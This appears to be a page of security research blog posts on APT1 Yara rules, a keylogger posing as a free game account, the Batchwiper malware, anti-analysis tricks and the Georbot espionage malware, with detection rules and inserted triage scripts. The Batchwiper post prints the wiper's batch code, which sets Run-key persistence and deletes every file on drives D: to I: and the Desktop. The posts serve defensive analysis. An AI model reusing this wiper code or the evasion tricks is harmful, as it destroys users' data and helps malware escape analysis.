AlienVault R&D Labs Portal. Get the latest news from our research.

Yara rules for APT1/Comment Crew malware arsenal

February 20th, 2013 | Posted by jaime.blasco in APT | Attacks | Forensics | Malware - (Comments Off)

I’m sure all of you have heard about Mandiant’s APT1 report, published yesterday. As many of you probably know, we have been tracking and exposing this group for a long time, as have other individuals and companies in the security industry. A couple of examples are:

Win32/Coswid

Unveiling a spearphishing campaign and possible ramifications

During the last few years we have been producing content to track and detect Comment Crew’s artifacts, such as Snort rules, Yara rules and IOCs. We have decided to publish some of this content, complemented with the great intel Mandiant published. The first package we are releasing is a set of 81 Yara rules that will help malware analysts and incident responders detect, classify and track the malware arsenal used by Comment Crew.

Some of these rules have been built to specifically detect Comment Crew’s tools and others are more generic.

You can download the rules from here.

How can I use the rules?

The easiest way to use this content is to install Yara (http://code.google.com/p/yara-project/). Once installed, you can use the yara command-line tool to detect and classify the files in your dataset. Example:

$ ../yara-1.6/yara apt1-2.yara files/
APT1_WEBC2_CLOVER files//01114c2b1212524c550bbae7b2bf9750aba70c7c98e2fda13970e05768d644cf
EclipseSunCloudRAT files//021b4ce5c4d9eb45ed016fe7d87abe745ea961b712a08ea4c6b1b81d791f1eca
APT1_TARSIP_ECLIPSE files//021b4ce5c4d9eb45ed016fe7d87abe745ea961b712a08ea4c6b1b81d791f1eca
APT1_WEBC2_Y21K files//02601a267fe980aed4db8ac29336f7ecf1e06f94e9ac0714e968b64586624898
APT1_WEBC2_CSON files//02601a267fe980aed4db8ac29336f7ecf1e06f94e9ac0714e968b64586624898
APT1_b64_cnc_commands files//02601a267fe980aed4db8ac29336f7ecf1e06f94e9ac0714e968b64586624898
APT1_WEBC2_Y21K files//060764506ad9134d5900fc0cd160fc14de80682f1861a3ef084c7c91a734881f
APT1_b64_cnc_commands files//060764506ad9134d5900fc0cd160fc14de80682f1861a3ef084c7c91a734881f
STARSYPOUND_APT1 files//082323fd0f3d24f8fe31895ad1246ae2116aee78d01be83a28c3cbb856541003
APT1_SY files//082323fd0f3d24f8fe31895ad1246ae2116aee78d01be83a28c3cbb856541003
APT1_WARP files//08af44d381df5250323cf196444aa90597f8049dad55712fe45e80b1a8d8cded
APT1_points files//08af44d381df5250323cf196444aa90597f8049dad55712fe45e80b1a8d8cded
APT1_readynewcmd files//0963ba541d56b9805713aa13d955b91f6bb875318698ba6119d5944d68c45afb
HACKSFASE2_APT1 files//0b9ca6fb32fcde1e6e55e8874982a2a921e73c6ebdf7246177fecf63542a4a83
ccrewSSLBack1 files//0b9ca6fb32fcde1e6e55e8874982a2a921e73c6ebdf7246177fecf63542a4a83
APT1_WEBC2_YAHOO files//0c50ddf7295d4ddfafae479e7c3ce21ca6416442c0c8c5e90aedbb3e583a8b20
APT1_uagent_iphone85 files//0c50ddf7295d4ddfafae479e7c3ce21ca6416442c0c8c5e90aedbb3e583a8b20
APT1_letusgo files//0c50ddf7295d4ddfafae479e7c3ce21ca6416442c0c8c5e90aedbb3e583a8b20
APT1_WEBC2_QBP files//0c8ad4824264dd09b3be02f462f968729bf7339438bf5fa69af9ca995353f6df
APT1_WEBC2_GREENCAT files//0e829513658a891006163ccbf24efc292e42cc291af85b957c1603733f0c99d4

There are also several projects and products that accept Yara rules as an input format. Here are some examples:

- JSUnpack

- Virustotal VTMIS

- Volatility, example of using the Yara plugin in Volatility

- Fireeye

We’ve reviewed the rules to minimize false positives, but please send us your feedback and we will use it to improve the Yara rules.

Here is the complete list of Yara rules released:

LIGHTDART_APT1
AURIGA_APT1
AURIGA_driver_APT1
BANGAT_APT1
BISCUIT_GREENCAT_APT1
BOUNCER_APT1
BOUNCER_DLL_APT1
CALENDAR_APT1
COMBOS_APT1
DAIRY_APT1
GLOOXMAIL_APT1
GOGGLES_APT1
HACKSFASE1_APT1
HACKSFASE2_APT1
KURTON_APT1
LONGRUN_APT1
MACROMAIL_APT1
MANITSME_APT1
MINIASP_APT1
NEWSREELS_APT1
SEASALT_APT1
STARSYPOUND_APT1
SWORD_APT1
thequickbrow_APT1
TABMSGSQL_APT1
CCREWBACK1
TrojanCookies_CCREW
GEN_CCREW1
Elise
EclipseSunCloudRAT
MoonProject
ccrewDownloader1
ccrewDownloader2
ccrewMiniasp
ccrewSSLBack2
ccrewSSLBack3
ccrewSSLBack1
ccrewDownloader3
ccrewQAZ
metaxcd
MiniASP
DownloaderPossibleCCrew
APT1_MAPIGET
APT1_LIGHTBOLT
APT1_GETMAIL
APT1_GDOCUPLOAD
APT1_WEBC2_Y21K
APT1_WEBC2_YAHOO
APT1_WEBC2_UGX
APT1_WEBC2_TOCK
APT1_WEBC2_TABLE
APT1_WEBC2_RAVE
APT1_WEBC2_QBP
APT1_WEBC2_KT3
APT1_WEBC2_HEAD
APT1_WEBC2_GREENCAT
APT1_WEBC2_DIV
APT1_WEBC2_CSON
APT1_WEBC2_CLOVER
APT1_WEBC2_BOLID
APT1_WEBC2_ADSPACE
APT1_WEBC2_AUSOV
APT1_WARP
APT1_TARSIP_ECLIPSE
APT1_TARSIP_MOON
APT1_aspnetreport
APT1_Revird_svc
APT1_letusgo
APT1_dbg_mess
APT1_known_malicious_RARSilent

Update (02/22/2013): We have improved the ruleset, update to the latest version!

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.


A couple of days ago, I was surfing our wild Internet when I came across a dirty piece of software dedicated to stealing accounts of a popular build-with-bricks videogame.

The program offered a premium account for the videogame for free. In reality it was a stealer: it installs a keylogger on your computer that records your private information and sends it to the bad actors.

When the user executes the program, the keylogger silently installs itself and then hides its directories and processes. If we take a look at the installation directory, it contains these files:

d6192e6ac19bedf50772769568b8a1bf RKJ.00 (encrypted configuration file)
c8602a35ed53655f62eb70e52627f7ef RKJ.01 (aux exec file)
cabd1ee6acc039dd33ba48f886f3b12d RKJ.02 (aux exec file 2)
29c88770640993a5f0df70bfa272bb09 RKJ.exe (main executable)

It looks like an Ardamax Keylogger installation, latest version. This is a pretty popular keylogger among bad guys; it comes in trial and paid versions. It can monitor keystrokes, login credentials and the clipboard, and even take screenshots and pictures from the webcam.

A couple of minutes after the infection, the machine started to connect to Google’s email server over an encrypted channel (SMTP over SSL). Is the keylogger reporting its results to its administrator this way? If so, we could probably analyse the sample and recover the email account credentials of the malware administrator.

As the configuration file is encrypted, the easiest way to get more information is to do some reverse engineering. Let’s infect a machine, dump its memory (keylogger.mem) and analyse it with Volatility.

$ python vol.py -f keylogger.mem pslist

The keylogger process is hidden from the Windows Task Manager, but Volatility can show it to us.

Offset(V) Name PID PPID Thds
0x862d6528 RKJ.exe 1832 1528 1

Time to dump process memory.

$ python vol.py -f keylogger.mem memdump -p 1832 --dump-dir=/tmp/

And if we carefully study the strings contained in that memory dump (mind the encoding!)…

$ strings -a --encoding=l 1832.dmp
[...]
Logs from "%USERNAME%
[censored].server232@gmail.com --> username
smtp.googlemail.com --> password
[...]

Luckily Google had already disabled the email account for service abuse, so there was no need to report it.

What about the encrypted configuration file?

We have seen some people infected by this keylogger wondering how to decrypt the file to find out where the malware is leaking their information to. Well, even if you cannot do memory analysis or some debugging, it is quite easy to decrypt.

After a quick cryptanalysis of the file, it is quite obvious that it is encrypted with a XOR cipher or something similar. You can easily decrypt it with a XOR analysis tool such as xortool. Let’s give it a try:

$ python xortool.py -b keylogger/RKJ.00

xortool generates a number of output files with candidate decryptions. In this case the 33rd file was the right one: the configuration is encrypted with the key “Z|NY”. If we open it with an editor, we can see all the configuration parameters and the reporting credentials in plain text.
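The key recovery that xortool automates, as an added example that is not part of the original post: it guesses the key length from per-column byte statistics, tries every candidate for the most frequent plaintext byte (what the -b brute force does) and keeps the decryption that looks most like text. The encrypted blob is a constructed stand-in for RKJ.00 with NUL-padded fields; that layout is an assumption, not the real file format.

```python
# Added example (not from the original post): repeating-key XOR recovery as
# xortool does it, run on a constructed stand-in for the RKJ.00 config file.
from collections import Counter
from itertools import cycle

KEY = b"Z|NY"  # the key the post reports for the real RKJ.00


def field(value: bytes, width: int = 32) -> bytes:
    """Fixed-width, NUL-padded field (an assumed config layout)."""
    return value.ljust(width, b"\x00")


# Constructed plaintext; the real file layout is not known.
PLAINTEXT = b"".join(field(f) for f in (
    b"Mode=Stealth", b"Interval=30", b"Method=SMTP",
    b"Server=smtp.googlemail.com", b"Port=465",
    b"User=user@example.com", b"Password=s3cret"))


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def guess_key_length(data: bytes, max_len: int = 16) -> int:
    """Split the ciphertext into n columns (bytes that share one key byte);
    only when n is a multiple of the true key length does every column have
    a strongly dominant byte. The n**1.5 penalty stops multiples of the
    true length from winning (xortool's fitness heuristic)."""
    def fitness(n: int) -> float:
        cols = [data[i::n] for i in range(n)]
        return sum(Counter(c).most_common(1)[0][1] for c in cols) / (max_len + n ** 1.5)
    return max(range(1, max_len + 1), key=fitness)


def key_for(data: bytes, n: int, common_plain: int) -> bytes:
    """If common_plain is the most frequent plaintext byte, each key byte is
    that column's most frequent ciphertext byte XOR common_plain."""
    return bytes(Counter(data[i::n]).most_common(1)[0][0] ^ common_plain
                 for i in range(n))


def plausibility(text: bytes) -> float:
    """Fraction of bytes that look like text or NUL padding."""
    ok = set(range(0x20, 0x7F)) | {0x00, 0x09, 0x0A, 0x0D}
    return sum(b in ok for b in text) / len(text)


def brute_force(data: bytes, n: int) -> tuple:
    """xortool -b: try every value for the most frequent plaintext byte and
    keep the key whose decryption looks most like text."""
    keys = [key_for(data, n, p) for p in range(256)]
    best = max(keys, key=lambda k: plausibility(xor(data, k)))
    return best, xor(data, best)


if __name__ == "__main__":
    blob = xor(PLAINTEXT, KEY)
    n = guess_key_length(blob)
    key, plain = brute_force(blob, n)
    print(n, key, plain.replace(b"\x00", b" ").decode())
```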

Take care of the channels you allow on your network! We have seen how Google does a great job of cancelling accounts of this kind, but we should never have blind faith in a legitimate-looking connection, because it can be a way to leak private information to the outside.

Batchwiper: Just Another Wiping Malware

December 17th, 2012 | Posted by jaime.blasco in APT | Attacks | Forensics | Malware - (Comments Off)

A few days ago, the Iranian CERT (Maher Center) released information about a newly identified targeted malware with wiping capabilities. The piece of code is very simple: it deletes files on different drives on specific dates.

The original dropper is a self-extracting RAR file with the name GrooveMonitor.exe. Once executed it extracts the following files:

\WINDOWS\system32\SLEEP.EXE, md5: ea7ed6b50a9f7b31caeea372a327bd37

\WINDOWS\system32\jucheck.exe, md5: c4cd216112cbc5b8c046934843c579f6

\WINDOWS\system32\juboot.exe, md5: fa0b300e671f73b3b0f7f415ccbe9d41

juboot.exe is executed first. It creates and executes the following bat file:

\Documents and Settings\%User%\Local Settings\Temp\1.tmp\juboot.bat

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"

As you can see, the bat file uses reg.exe to create a registry value under the Run key; the malware uses it to maintain persistence by executing jucheck.exe every time the system boots.

Then jucheck.exe is executed, which creates the file \Documents and Settings\Administrator\Local Settings\Temp\4.tmp\jucheck.bat:

@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\Desktop\*.*" /q /s /f
\\start calc

:no

As you can see, when the bat file is executed it deletes juboot.exe as well as the GrooveMonitor.exe executable that resides in the Start Menu folder. Then the bat file checks the system date and, if it matches one of the predefined dates, it runs the wiping routine. This routine checks which of the drives D: to I: exist and then deletes every file on them. Finally it wipes the Desktop folder of the user profile.
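A triage helper, added here and not part of the original post, that pulls the Run-key persistence, the trigger dates and the wipe targets out of a Batchwiper-style script, so an analyst can see what it persists, when it fires and what it deletes without reading the whole file. The script text is a constructed excerpt following the juboot.bat and jucheck.bat listings above.

```python
# Added example (not from the original post): triage of a Batchwiper-style
# batch script: persistence key, trigger dates and wipe targets.
import re
from datetime import date, datetime
from typing import Optional

# Constructed excerpt following the post's juboot.bat / jucheck.bat listings.
SAMPLE = r'''
@echo off & setlocal
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
del "%systemroot%\system32\juboot.exe" /q /s /f
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Mon 02/02/2015" goto yes
goto no
:yes
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
del "%userprofile%\Desktop\*.*" /q /s /f
:no
'''

# reg add <key ending in \Run> /v <name> ... /d "<command>"
RUN_KEY = re.compile(r'^\s*reg\s+add\s+(\S*\\Run)\s+/v\s+(\S+).*?/d\s+"([^"]+)"',
                     re.I | re.M)
# if "%date%"=="Mon 12/10/2012" goto yes   (the %date% gate of jucheck.bat)
DATE_GATE = re.compile(r'^\s*if\s+"%date%"=="(\w{3} \d{2}/\d{2}/\d{4})"\s+goto\s+\w+',
                       re.I | re.M)
# del "<path>\*.*" /q /s /f   (recursive, quiet, forced: the wiping primitive)
WIPE = re.compile(r'\bdel\s+"([^"]+\\\*\.\*)"\s+/q\s+/s\s+/f', re.I)


def triage(script: str) -> dict:
    """Summarise what the script persists, when it fires and what it deletes."""
    persistence = [{"key": k, "value": v, "command": c}
                   for k, v, c in RUN_KEY.findall(script)]
    # The day-of-week prefix is dropped; only the date part is compared.
    triggers = sorted({datetime.strptime(d[4:], "%m/%d/%Y").date()
                       for d in DATE_GATE.findall(script)})
    wipes = WIPE.findall(script)
    drives = sorted({w[0].upper() for w in wipes if re.match(r"^[a-z]:\\", w, re.I)})
    return {"persistence": persistence, "triggers": triggers,
            "wipe_targets": wipes, "drives": drives}


def next_trigger(script: str, today: str) -> Optional[str]:
    """First trigger date (ISO format) on or after `today`, or None if all have passed."""
    cutoff = date.fromisoformat(today)
    return next((d.isoformat() for d in triage(script)["triggers"] if d >= cutoff), None)


if __name__ == "__main__":
    summary = triage(SAMPLE)
    print("persistence:", summary["persistence"])
    print("triggers:", [d.isoformat() for d in summary["triggers"]])
    print("drives:", summary["drives"], "next:", next_trigger(SAMPLE, "2013-01-01"))
```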

We don’t have details about the infection vector, but based on the dropper it could be deployed via USB drives, internal actors or spear phishing, or probably as the second stage of a targeted intrusion.

We have built some OpenIOC indicators that you can access here.



It is well known that a large share of malware samples are aware of their execution environment. This means that a sample can change its behaviour if it detects that it is running in an unwanted environment.

There are resources, public source code and even programs that detail how to bypass automatic malware analysis systems and make things awkward for malware researchers. Of course, these resources are quite useful for both researchers and malware developers.

We are going to take a look at some of these tricks, all found in real malware samples.

Also, just as they do, we have developed some Yara signatures to detect these tricks; they could be useful for processing or classifying such malware samples differently.

We could classify anti analysis tricks in three big groups:

- Anti Virtual Machine, that tries to detect if the execution environment is a known VM or emulator.
- Anti Debugging, that tries to detect if the program is running under the surveillance of a debugger.
- Anti Sandbox, that tries to detect known sandboxing products.

It is not unusual to find all kinds of tricks in a single malware sample. For example, we can take a look at the sample 9255c75de8fbc20ee67f427397e1ef82:

We can quickly find that it looks for sbiedll.dll (to detect Sandboxie) and dbghelp.dll:

It also opens the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum and reads the value 0 to get the ID of the hard disk in the machine:

The result is then compared with these three strings (VIRTUAL, VMWARE, VBOX):

Finally, it opens the registry key HKLM\Software\Microsoft\Windows\CurrentVersion with value ProductId:

And checks it against these three known MS Windows product IDs from different commercial sandboxes:

If we take a look at another sample (36527d5954bf3b2af60e6efa6398ccff), we find a dedicated function for this check:

It checks the MS Windows product ID and, if it is "76487-644-3177037-23510", the function returns 1; otherwise it returns 0. Functions with the same prototype check for the keys "55274-640-2673064-23950" and "76487-337-8429955-22614".

This sample also uses MS Windows system functions to detect debugging.

It resolves the address of IsDebuggerPresent at run time with GetProcAddress() from kernel32.dll. Hey, wait! Why not call IsDebuggerPresent() directly? Because it is noisy and easily detectable.

If it cannot load the function, or the function returns 0 (no debugger present), the check returns 0. Otherwise it returns nonzero.

It also looks for files (SyserDbgMsg / SyserBoot) and (SICE / NTICE) using this function:

This trick detects both the Syser and SoftICE debuggers.

As we said, we have published a ruleset of Yara signatures to detect anti-VM, anti-debugger and anti-sandbox procedures in malware samples. You can grab it from our GitHub repository here.
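An added example (not the Labs Yara ruleset from the repository) that scans a binary for the indicators walked through above and buckets them into AntiVM, AntiDebug and AntiSandbox. The sample blob is constructed, with some strings stored as UTF-16LE the way Windows binaries often keep them, so the scan also looks at both byte alignments with the wide-string interleaving removed.

```python
# Added example (not the Labs Yara ruleset): string-level triage of the
# anti-analysis checks described in the post, over a constructed sample.
import re

# Indicator regex -> category, following the checks the post walks through.
INDICATORS = {
    r"sbiedll\.dll": "AntiSandbox",                 # Sandboxie DLL
    r"76487-644-3177037-23510": "AntiSandbox",      # sandbox ProductIds
    r"55274-640-2673064-23950": "AntiSandbox",
    r"76487-337-8429955-22614": "AntiSandbox",
    r"Services\\Disk\\Enum": "AntiVM",              # disk ID registry key
    r"\b(?:VIRTUAL|VMWARE|VBOX)\b": "AntiVM",       # values compared against it
    r"IsDebuggerPresent": "AntiDebug",
    r"dbghelp\.dll": "AntiDebug",
    r"Syser(?:DbgMsg|Boot)": "AntiDebug",           # Syser debugger
    r"\\(?:SICE|NTICE)\b": "AntiDebug",             # SoftICE
}
PATTERNS = [(re.compile(p.encode(), re.I), cat) for p, cat in INDICATORS.items()]


def wide(s: str) -> bytes:
    """UTF-16LE, the form many Windows binaries store strings in."""
    return s.encode("utf-16-le")


# Constructed stand-in for a sample: a few indicators, some stored wide.
SAMPLE = (b"\x00" * 16
          + b"kernel32.dll\x00GetProcAddress\x00IsDebuggerPresent\x00"
          + wide("SYSTEM\\ControlSet001\\Services\\Disk\\Enum") + b"\x00\x00"
          + b"VMWARE\x00VBOX\x00"
          + wide("sbiedll.dll") + b"\x00\x00"
          + b"76487-644-3177037-23510\x00"
          + b"\\\\.\\SICE\x00" + b"\x00" * 16)


def classify(blob: bytes) -> dict:
    """{category: {matched text, ...}} over the raw bytes and over both
    byte alignments of the blob with the UTF-16LE interleaving removed."""
    views = [blob, blob[0::2], blob[1::2]]
    hits = {}
    for view in views:
        for pat, cat in PATTERNS:
            for m in pat.finditer(view):
                hits.setdefault(cat, set()).add(m.group().decode("latin-1"))
    return hits


def verdict(blob: bytes) -> str:
    """Short label for the categories found, e.g. AntiDebug+AntiVM."""
    cats = classify(blob)
    return "+".join(sorted(cats)) if cats else "none"


if __name__ == "__main__":
    for cat, found in sorted(classify(SAMPLE).items()):
        print(cat, sorted(found))
    print(verdict(SAMPLE))
```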

A few days ago, CERT-Georgia published a great report describing a cyber espionage campaign; ESET wrote a great report a few months ago as well. The report says the malware was found in Georgian governmental agencies, including ministries, parliament, banks and NGOs. It also says the purpose of the malware was “Collecting Sensitive, Confidential Information about Georgian and American Security Documents”, and it establishes a connection with Russian official security agencies.

In this blog post we offer a brief overview of the infection vectors and the malware behaviour, and we share some IOCs and signatures to detect the presence of the malware on your systems.

Infection method

To compromise the victims, the attackers placed JavaScript code or iframes into websites, leading visitors to exploit code.

The compromised websites include Georgian government servers such as ema.gov.ge. Some examples are:

- ema.gov.ge

- 31.214.140.214

- 178.32.91.70

- georgiaonline.xp3.biz

- 31.31.75.63

- 173.212.192.83

An example of the malicious JavaScript is as follows:

[Figure: example of the injected malicious JavaScript]

The malicious JavaScript in frame.js/frame.php includes code that exploits several vulnerabilities, including CVE-2010-0842, CVE-2006-3730, MS06-057 and some Java exploits.

Examples of exploit codes found:

178.32.91.70 [/] modules[/]docs[/]newexp[.]jar https://www.virustotal.com/file/9bf88bf15ffa6888ec2a3bd9e8dc6d13b650f1122ca69cface9ccf777c32e259/analysis/

178.32.91.70 [/] modules[/]docs[/]Java-2010-0842[.]jar

https://www.virustotal.com/file/7a900cc7616cfbf2ca17350c436af2490621550ded3e29325dc31149db50c63d/analysis/


Once the exploit code is executed, the payload calc.exe that contains the malware is downloaded from the remote server.

The malware uses a custom packer to evade security products. It also uses obfuscation to hide both the configuration values and the API calls.

The malware uses byte subtraction operations to hide the strings, including the configuration values:

[Figure: the obfuscated strings]

After deobfuscation:

[Figure: the strings after deobfuscation]

We can use the following Yara rule to detect the obfuscated binary:

rule GeorBotBinary
{
strings:
$a = {63 72 ?? 5F 30 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C}

condition:
all of them
}

Based on the deobfuscated strings we can also write a Yara rule to detect the presence of the malware in memory:

rule GeorBotMemory
{
strings:
$a = {53 4F 46 54 57 41 52 45 5C 00 4D 69 63 72 6F 73 6F 66 74 5C 00 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 00 52 75 6E 00 55 53 42 53 45 52 56}
$b = {73 79 73 74 65 6D 33 32 5C 75 73 62 73 65 72 76 2E 65 78 65}
$c = {5C 75 73 62 73 65 72 76 2E 65 78 65}
condition:
$a and ($b or $c)
}

The rule uses both the registry key used to maintain persistence and the name of the executable the malware creates on the system (in version 5 and later of the malware those values are stored as wide strings).

If we have a memory image of a system we can use Volatility to look for processes matching our Yara rule:

$ python vol.py -f /Users/jaime/tmp/geor.img yarascan -y GeorBotMemory.yara
Volatile Systems Volatility Framework 2.1_alpha

Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004055b3 53 4f 46 54 57 41 52 45 5c 00 4d 69 63 72 6f 73 SOFTWARE\.Micros
0x004055c3 6f 66 74 5c 00 57 69 6e 64 6f 77 73 5c 43 75 72 oft\.Windows\Cur
0x004055d3 72 65 6e 74 56 65 72 73 69 6f 6e 5c 00 52 75 6e rentVersion\.Run
0x004055e3 00 55 53 42 53 45 52 56 00 2e 64 6f 63 00 2e 78 .USBSERV..doc..x
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059a6 73 79 73 74 65 6d 33 32 5c 75 73 62 73 65 72 76 system32\usbserv
0x004059b6 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 53 5c .exe.C:\WINDOWS\
0x004059c6 73 79 73 74 65 6d 33 32 5c 75 73 62 63 6c 69 65 system32\usbclie
0x004059d6 6e 74 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 nt.exe.C:\WINDOW
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059ae 5c 75 73 62 73 65 72 76 2e 65 78 65 00 43 3a 5c \usbserv.exe.C:\
0x004059be 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d 33 32 WINDOWS\system32
0x004059ce 5c 75 73 62 63 6c 69 65 6e 74 2e 65 78 65 00 43 \usbclient.exe.C
0x004059de 3a 5c 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d :\WINDOWS\system

Network traffic

The malware uses HTTP to communicate with the C&C server. It supports several commands to upload and retrieve information from the victim. It also checks for malware updates every once in a while; in early versions the update was requested from /modules/docs/upload/calc.exe on the C&C server.

[Figure: update request for /modules/docs/upload/calc.exe]

In newer versions the malware requests /calc.php and the server returns base64-encoded content (it can be served from several servers at the same time).

[Figure: /calc.php request and base64-encoded response]

When the malware starts it sends the following request to the C&C:

[Figure: initial check-in request]

Every minute it sends the following HTTP request to the C&C to ask for instructions:

[Figure: periodic check-in request]

Newer versions also introduce the parameter “cam”, which tells the C&C whether the infected system has a webcam:

/index312.php?ver=5.1&cam=0&p=cert123&id=401acd00

You can use the following Snort rules to detect the presence of this malware on your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Georbot requesting update"; flow: to_server,established; content:"/modules/docs/upload/calc.exe"; http_uri; classtype:trojan-activity; sid:1111111112; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Georbot initial checkin"; flow: to_server,established; content:"POST"; http_method; nocase; content:".php?ver="; http_uri; content:"&p=cert123"; fast_pattern; http_uri; content:"&id="; http_uri; classtype:trojan-activity; sid:1111111113; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Georbot checkin"; flow: to_server,established; content:".php?ver="; http_uri; content:"&p=bot123"; fast_pattern; http_uri; content:"&id="; http_uri; classtype:trojan-activity; sid:1111111114; rev:1;)

Emerging Threats Pro has coverage for previous versions (see “ETPRO TROJAN TDSS.xcn”) but the rules I posted will work with newer versions of the malware as well.
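The three Snort rules re-expressed as Python checks so the matching logic can be exercised offline, as an added example that is not part of the original post. The request lines are constructed and the hostnames are placeholders. The strict variant illustrates one caveat: Snort content matches are substring matches, so "&p=cert123" also fires on a parameter value such as cert1234, while comparing the parsed p= value does not.

```python
# Added example (not from the original post): the three Snort rules above as
# Python checks over constructed request lines; hostnames are placeholders.
from typing import Optional
from urllib.parse import parse_qs, urlsplit

LOG = [
    ("GET",  "http://cnc.example/modules/docs/upload/calc.exe"),
    ("POST", "http://cnc.example/index312.php?ver=5.1&cam=0&p=cert123&id=401acd00"),
    ("GET",  "http://cnc.example/index312.php?ver=5.1&cam=0&p=bot123&id=401acd00"),
    ("GET",  "http://www.example.org/index.php?page=3"),
    ("POST", "http://www.example.org/status.php?ver=2&p=cert1234&id=7"),
]


def uri_of(url: str) -> str:
    """The request URI as Snort's http_uri buffer sees it: path plus query."""
    u = urlsplit(url)
    return u.path + ("?" + u.query if u.query else "")


def snort_like(method: str, uri: str) -> Optional[str]:
    """Same logic as the rules: each content match is a plain substring test
    on the URI, plus the http_method test on the initial check-in rule."""
    if "/modules/docs/upload/calc.exe" in uri:
        return "Georbot requesting update"
    if ".php?ver=" in uri and "&id=" in uri:
        if "&p=cert123" in uri and method.upper() == "POST":
            return "Georbot initial checkin"
        if "&p=bot123" in uri:
            return "Georbot checkin"
    return None


def parse_checkin(uri: str) -> dict:
    """Beacon fields from a check-in URI; cam is absent in older versions."""
    q = {k: v[0] for k, v in parse_qs(urlsplit(uri).query).items()}
    return {f: q.get(f) for f in ("ver", "cam", "p", "id")}


def strict(method: str, uri: str) -> Optional[str]:
    """Compare the whole p= value, so '&p=cert1234' is not mistaken for cert123."""
    if "/modules/docs/upload/calc.exe" in uri:
        return "Georbot requesting update"
    f = parse_checkin(uri)
    if not (uri.split("?")[0].endswith(".php") and f["ver"] and f["id"]):
        return None
    if f["p"] == "cert123" and method.upper() == "POST":
        return "Georbot initial checkin"
    if f["p"] == "bot123":
        return "Georbot checkin"
    return None


def scan(log, matcher) -> list:
    """Rule names that fire, in log order, for a given matcher."""
    return [name for method, url in log if (name := matcher(method, uri_of(url)))]


if __name__ == "__main__":
    print(scan(LOG, snort_like))
    print(scan(LOG, strict))
    print(parse_checkin(uri_of(LOG[1][1])))
```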

Based on the behavior of the malware we wrote this OpenIOC rule:

[Figure: OpenIOC rule]

You can download all the content from this blog post on the following url:

https://github.com/jaimeblasco/AlienvaultLabs/tree/master/malware_analysis/Georbot

Happy Halloween!

